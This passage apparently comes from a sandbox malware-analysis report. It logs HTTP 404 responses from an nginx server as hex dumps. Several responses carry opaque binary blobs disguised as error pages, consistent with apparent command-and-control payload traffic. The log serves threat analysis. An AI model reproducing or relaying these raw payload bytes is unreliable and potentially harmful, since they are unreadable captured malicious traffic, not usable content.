f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 
97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 48 8a 79 b3 54 95 5f 47 5b d7 47 fd f7 5f 41 16 04 f0 67 35 8b 47 47 b8 26 83 63 1f 06 56 97 9b c9 11 b7 a7 b0 81 21 59 20 1a 5b 8c 1e f9 c3 97 29 59 20 d5 16 8d 88 d8 24 27 06 7e 2a d4 49 96 b7 95 e2 c7 c4 c3 58 e2 79 dd 83 78 0c 00 9c 2f 73 9d 0b d2 68 ac 80 b9 86 58 9d 23 ee 62 21 30 26 25 55 64 97 c5 7b eb cd 77 50 c6 e1 2a f7 16 b2 49 be eb 08 2c 4d df 0d 9d 94 48 cd d5 13 52 e2 13 de 06 be 34 4a 31 36 e1 74 20 08 70 90 ea 7c e9 e1 1d 2f 2a 8b 1f 19 42 a3 08 15 70 4c 61 08 2e 7b 12 13 a7 41 aa e9 c0 c7 f5 b5 aa f6 4d b0 da 53 ef cf 14 a9 19 2b af ac 9e 8e e3 1f 9f 16 ed 55 0a ec 50 18 fe 1d f5 0b 62 61 32 1d 3f 6d 5b 9c ee e0 0e 6a ee b5 4b bc 61 41 bf be 55 b1 b6 0a bb c0 04 c0 77 9c 80 79 af 15 22 6b a8 d0 63 fb a5 ae c0 41 33 36 88 c7 03 e6 ca 58 70 9e d0 a4 9f 65 34 bf ff 2c 83 19 72 4c 35 f7 61 ce
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 66 61 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 96 32 68 54 8f ad 7e 3d 23 fd 85 f1 ff 6e 59 32 64 fc eb 13 35 50 b4 3b f7 48 70 b0 d0 9e 5f f2 c6 93 9c 84 0a b6 3b 85 a3 87 a9 fd 5c 9c 3d 3f 01 8b d4 be 6e cf 51 e9 3d 7c 8c 1c de 17 b7 82 06 a7 ab 67 c5 5f 21 94 73 6a a9 9a f5 fc 75 11 bf 6c 13 d9 1e 8b 34 8b 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 57 53 a9 06 0e ff 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5c db c4 19 12 13 bf f8 62 90 24 08 4f c5 d3 e3 cb a1 61 6e de f5 69 89 18 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a e4 bb 7e 88 2c c8 48 61 26 c6 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 67 99 f4 1a 54 9b 4a d8 19 fe 48 4d e3 11 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 b5 8a 33 85 98 90 f7 2f e4 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 9f c3 d9 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 c6 e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 c1 4c a0 90 4e b1 54 55 a5 9a b6 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 00 38 85 f3 2c 6e af 03 5b 85 1b e4 a6 65 11 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 cb f8 f9 82 62 7a d7 44 e0 c3 e0 2b f9 30 b9 01 10 17 28 d2 d6 43 1f d0 a1 aa 
7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c e7 52 90 3e 27 a7 3a 96 29 a3 e7 17 3f 1c 61 7c 4d cc 70 d4 03 09 a9 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e5 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a2 4e f2 7a a6 64 12 09 78 e3 28 01 7c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 27Uys/~(`:LDNzdx(|0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 33 38 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 86 19 d8 5a d5 e4 0f b6 39 bf 29 4a 54 78 e5 76 08 6b 8d 5c 66 28 71 c3 a2 89 b9 e6 21 d0 73 3a 16 35 ff b7 0d 0a 30 0d 0a 0d 0a Data Ascii: 38Uys/~(u:RZ9)JTxvk\f(q!s:50
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 66 61 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 c1 56 26 40 d8 c9 30 29 74 99 cb e5 a8 0a 17 26 33 98 b4 07 5c 34 fa 2f a0 2c 28 a4 10 fa 11 e6 a8 63 2a 90 25 d2 75 91 d3 25 9d e9 9e f8 73 2b 48 bd 1f aa 74 ab 1f fd 6a 18 dc 08 89 73 f9 96 51 c3 e0 73 92 3b 6f 80 36 f8 37 33 a3 98 3b 05 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 08 5a f7 fd 3c 5b 56 3f cb 00 23 be 42 15 37 07 50 52 f1 ca 16 9e 1d ef 53 2b e5 a9 94 7b 7e 45 f7 ff 8e 19 55 db c4 1d 13 13 bf 1e e3 92 24 08 0f c5 03 b1 cb a1 61 7c de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d 80 57 19 e0 28 95 a9 ad 5c f1 96 bc 25 51 e1 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 0d c0 5d bf 46 34 fd f8 f6 8b 32 6c 79 7c 0a 8d c7 3d fc 0e b4 a8 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 29 2a b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 e7 72 3c 27 94 69 b7 9f 33 c9 cc 46 d9 48 15 ac af fb d9 55 1d ad ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 57 d4 13 51 8c 60 17 4b 81 8d de 8e 82 05 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 4f c3 cb 49 1c 4c 86 2f 7f 54 ab 1e 62 cc 07 ee c3 ce 55 a3 4c 3d 84 1f d4 b6 69 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 e6 7d 10 5f 3e cb aa c2 fa 07 99 8a dd a7 7f 74 79 90 75 43 cc fd 8b 8b e1 68 79 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f d0 a1 aa 
7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 66 61 30 0d 0a 02 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 15 13 e4 51 a2 d1 24 08 4f c5 03 a1 cb a1 81 7e 50 54 62 b8 1b 0e 7e 17 a4 9a a5 68 d1 a0 c1 b9 dd 7a 35 c4 45 19 e0 3c 95 a9 18 7a fe 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6f a1 c0 4a 9a 03 fd ec 9a aa 7b ac 87 2f bd 61 0d 00 7e bf 46 30 fd f8 1a d6 10 6c 2b 7c 0b 8d c7 fd e4 0e a4 eb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 fb 21 b9 80 ca cc 23 b2 95 02 31 79 72 86 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af c1 37 27 a4 8e b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e ce 3a 1a ee c3 de 57 a3 4c 55 8e 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 69 d9 7f 74 79 30 66 43 cc 87 8b 8b e1 2e 71 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 
7a 8f f6 6b e3 fc c2 d9 37 00 20 e8 1c c9 20 f5 52 48 4e 31 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e 6d b2 ce ec 35 58 c8 a7 0d 8e ca d4 5f a3 48 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 0f bf c5 ac 8b c8 2f bb 05 09 e8 8b d3 15 ac 18 50 77 b3 0e 23 8a 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 53 e8 b8 1c 6b 93 83 01 ee 43 d9 ed 07 52 44 dc 1a 7e 87 18 57 c1 17 7d 42 9b 8d 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 33 0f b6 35 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 